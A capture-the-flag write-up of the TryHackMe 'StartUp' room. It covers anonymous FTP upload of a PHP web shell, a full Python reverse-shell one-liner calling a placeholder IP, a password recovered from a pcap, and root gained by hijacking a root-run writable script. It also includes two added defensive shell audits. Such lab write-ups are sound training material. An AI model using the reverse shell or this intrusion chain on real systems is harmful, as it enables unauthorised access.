Tryhackme — 3 min read
StartUp is an easy-rated room developed by r1gormort1s. You can check out the room here.
As always, let's start with nmap.
nmap -sC -sV -v -oA nmap/initial IP
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxrwx    2 65534    65534        4096 Nov 12 04:53 ftp [NSE: writeable]
| -rw-r--r--    1 0        0          251631 Nov 12 04:02 important.jpg
|_-rw-r--r--    1 0        0             208 Nov 12 04:53 notice.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.9.51.118
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b9:a6:0b:84:1d:22:01:a4:01:30:48:43:61:2b:ab:94 (RSA)
|   256 ec:13:25:8c:18:20:36:e6:ce:91:0e:16:26:eb:a2:be (ECDSA)
|_  256 a2:ff:2a:72:81:aa:a2:9f:55:a4:dc:92:23:e6:b4:3f (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Maintenance
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
We have anonymous FTP login allowed, so let's jump in and see what's in the FTP directory.
The notice.txt file said:
Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus.
Nothing interesting there; we just have a name, Maya, for now. We also have an image, important.jpg. I ran strings and exiftool and tried some stego on it, but in the end it's just a rabbit hole. What I had forgotten is that, as the nmap scan showed, we have write permissions in the ftp directory. And if you have that, you shouldn't even bother trying lame stego stuff!
I got a simple PHP web shell from here and uploaded it to the ftp directory. But we don't know yet where on the server it got uploaded. So I ran gobuster for some recon and found a /files directory: the FTP share is served by the web server under /files/ftp. Accessing our web shell in the browser, we have code execution.
Now, the first thing you do when you get code execution: yup, get a reverse shell! So I ran a simple Python one-liner reverse shell and we have a SHELL!
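The two misconfigurations that chain together here are anonymous upload being enabled in vsftpd and the FTP root living inside Apache's document root, so a dropped file instantly becomes a URL. The audit script below is an added example, not part of the original write-up or the room; it reads a vsftpd.conf and flags the anonymous-upload combination, and separately checks whether an FTP root path sits under a web document root. The config file and the /var/www/html/files/ftp path it is fed in the usage are constructed for the example.

```shell
#!/bin/sh
# Added example (not from the write-up): audit vsftpd settings and FTP/web root overlap.

# Print the effective value of a vsftpd.conf directive ("key=value", last one wins,
# commented lines ignored). Prints nothing if the key is absent.
vsftpd_get() {  # $1 = conf file, $2 = directive name
    grep -E "^[[:space:]]*$2=" "$1" | tail -n 1 | cut -d= -f2- | tr -d '[:space:]'
}

# Returns 0 (finding) when anonymous users can both log in and upload, else 1.
# anonymous_enable defaults to YES in vsftpd's documentation, so an absent key
# is treated as YES; write_enable and anon_upload_enable default to NO.
vsftpd_anon_upload_enabled() {  # $1 = conf file
    anon=$(vsftpd_get "$1" anonymous_enable)
    write=$(vsftpd_get "$1" write_enable)
    upload=$(vsftpd_get "$1" anon_upload_enable)
    : "${anon:=YES}"
    if [ "$anon" = "YES" ] && [ "$write" = "YES" ] && [ "$upload" = "YES" ]; then
        return 0
    fi
    return 1
}

# Returns 0 (finding) when the FTP root ($1) is the web document root ($2) or a
# subdirectory of it, i.e. anything uploaded over FTP is reachable over HTTP.
ftp_root_under_webroot() {  # $1 = ftp root, $2 = document root
    case "${1%/}/" in
        "${2%/}/"*) return 0 ;;
        *)          return 1 ;;
    esac
}

# Usage with a constructed config mirroring what nmap reported on this box.
demo_audit() {
    tmp=$(mktemp)
    printf 'anonymous_enable=YES\nwrite_enable=YES\nanon_upload_enable=YES\n' > "$tmp"
    if vsftpd_anon_upload_enabled "$tmp"; then
        echo "FINDING: anonymous upload enabled in $tmp"
    fi
    if ftp_root_under_webroot /var/www/html/files/ftp /var/www/html; then
        echo "FINDING: FTP root is served by the web server"
    fi
    rm -f "$tmp"
}
```

The fix on the server side is either anon_upload_enable=NO (or anonymous_enable=NO outright) or moving the FTP root out of the document root; the second check is worth keeping even when uploads are disabled, because a later config change can silently re-open the path to code execution.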
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
To make it stable and a full TTY, the usual stuff:
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL-Z to background it.
stty raw -echo
fg
reset
And now we have a PROPER SHELL! To confirm that, we run id and indeed, we are in as www-data.
Time for some recon. I manually looked for interesting stuff on the system, and in the root directory I found something.
We now have the secret recipe. If we look closely, there is one more directory that is not usual, incidents. It contains a file that is outright suspicious, as it is named suspicious.pcapng. So this is a network capture file and, as the directory name suggests, maybe it is an incident log. Opening it with Wireshark, we see a lot of HTTP and TCP traffic. Initially I looked at the exported HTTP objects, but there was nothing interesting there. On following a TCP stream, I saw an interesting conversation.
We have a password used by some attacker in their attack. There is just one user on the system, lennie; trying this password with lennie, we get a match. Now we are lennie. Looking in lennie's home directory, we have our user flag.
Okay, so if we look at the contents of lennie's home directory, we see a scripts directory owned by root, which is interesting.
But weirdly, there is no SUID bit set, and we also don't have write permissions on planner.sh, so let's leave it for now. I used linpeas for enumeration, but it didn't find anything juicy. I was stuck at this point. The only thing we have is a root-owned script, so let's focus on that. planner.sh is root-owned, and it simply does two things:
- Puts the content of the env variable LIST in the startup_list.txt file. We can't do anything bad with it.
- Runs /etc/print.sh.
Let's look at the permissions of print.sh. Dude, we have write permissions. But even if we do some stuff with this, we don't have SUID, so we can't be root. OR CAN WE? I decided to use pspy64, which is basically a process snooper that shows the processes running on the system (NO, it's not the same as running ps aux, man; it even shows you privileged processes. Try it, it's COOL!)
And as I suspected, root is running this script. So, the classic bad stuff: we have write permissions on print.sh, put a dumb bash one-liner reverse shell in it, and listen on your dumb netcat. After a minute, we have our root shell and our ROOT flag.
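The root cause of the privesc is not planner.sh itself but something it calls: root periodically runs a script whose dependency, /etc/print.sh, is writable by unprivileged users. The audit below is an added example, not code from the write-up or the room. Given a script that root runs, it lists every absolute path the script references and reports those that are writable by group or world, or whose parent directory is (which lets the file be swapped out even when the file itself is locked down). The planner.sh and print.sh it builds in the demo are constructed stand-ins for the ones on the box; on a real host you would point it at the scripts pspy or the crontab shows root executing.

```shell
#!/bin/sh
# Added example (not from the write-up): find loosely writable files that a
# root-run script depends on, the pattern behind the print.sh privesc.

# Print each absolute path mentioned in the script, one per line, deduplicated.
script_paths() {  # $1 = script
    grep -oE '/[A-Za-z0-9_./-]+' "$1" | sort -u
}

# Return 0 if $1 is writable by group or others. Uses ls -L so a symlinked
# directory such as /bin -> /usr/bin is judged by its target, not the link.
loosely_writable() {  # $1 = path
    perms=$(ls -ldL "$1" 2>/dev/null) || return 1
    case "$perms" in
        ?????w*|????????w*) return 0 ;;   # position 6 = group w, position 9 = other w
        *)                  return 1 ;;
    esac
}

# Report every existing path the script references (and the script itself) that
# is writable, or sits in a writable directory. Returns 0 when nothing was found.
audit_root_script() {  # $1 = script that root runs
    found=0
    for p in "$1" $(script_paths "$1"); do
        [ -e "$p" ] || continue
        if loosely_writable "$p"; then
            echo "WRITABLE: $p"
            found=1
        elif loosely_writable "$(dirname "$p")"; then
            echo "REPLACEABLE (parent dir writable): $p"
            found=1
        fi
    done
    return $found
}

# Usage on a constructed copy of the planner.sh / print.sh layout from the box.
demo_audit_root_script() {
    d=$(mktemp -d)
    printf '#!/bin/bash\necho $LIST > %s/startup_list.txt\n%s/print.sh\n' "$d" "$d" > "$d/planner.sh"
    printf '#!/bin/bash\necho "printed"\n' > "$d/print.sh"
    chmod 755 "$d" "$d/planner.sh"
    chmod 777 "$d/print.sh"          # the misconfiguration under discussion
    audit_root_script "$d/planner.sh" || echo "-> fix with: chmod 755 $d/print.sh"
    rm -rf "$d"
}
```

This only follows one level of references, so a script that sources another script that sources a third needs to be run through it per file; it also intentionally reports a writable parent directory, because on this box chmod 755 on print.sh alone would not have been enough if /etc had been writable.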
So this was overall a relatively easy TryHackMe room with a misconfigured FTP server, insecurely placed incident logs and bad file permissions.
Hope you learned something new. Thanks for reading and, as always,
See ya later!